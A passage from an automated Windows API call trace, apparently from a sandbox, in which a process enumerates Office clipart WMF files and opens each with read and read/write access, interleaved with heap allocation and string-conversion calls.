Flags=0x0, Size=0x70) returned 0x75eb8 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0101.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.061] AreFileApisANSI () returned 1 [0101.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0101.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.061] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.061] AreFileApisANSI () returned 1 [0101.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.061] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0101.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 69 [0101.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.062] GetFileType (hFile=0x368) returned 0x1 [0101.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0101.062] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.062] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.063] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.063] CloseHandle (hObject=0x368) returned 1 [0101.063] AreFileApisANSI () returned 1 [0101.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0101.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 69 [0101.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.063] GetFileType (hFile=0x368) returned 0x1 [0101.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0101.063] CloseHandle (hObject=0x368) returned 1 [0101.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.065] AreFileApisANSI () returned 1 [0101.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0101.065] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 69 [0101.065] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a50)) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0101.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.065] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x385c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN00932_.WMF", cAlternateFileName="")) returned 1 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.065] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0101.065] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0101.065] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0101.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.066] AreFileApisANSI () returned 1 [0101.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0101.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.066] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0101.066] AreFileApisANSI () returned 1 [0101.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0101.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 69 [0101.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.066] GetFileType (hFile=0x368) returned 0x1 [0101.066] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0101.067] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.067] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.067] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.067] CloseHandle (hObject=0x368) returned 1 [0101.067] AreFileApisANSI () returned 1 [0101.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.068] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0101.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 69 [0101.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.069] GetFileType (hFile=0x368) returned 0x1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0101.069] CloseHandle (hObject=0x368) returned 1 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.069] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.069] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.070] AreFileApisANSI () returned 1 [0101.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.070] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0101.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 69 [0101.070] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbf13fd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x385c)) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0101.070] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.070] 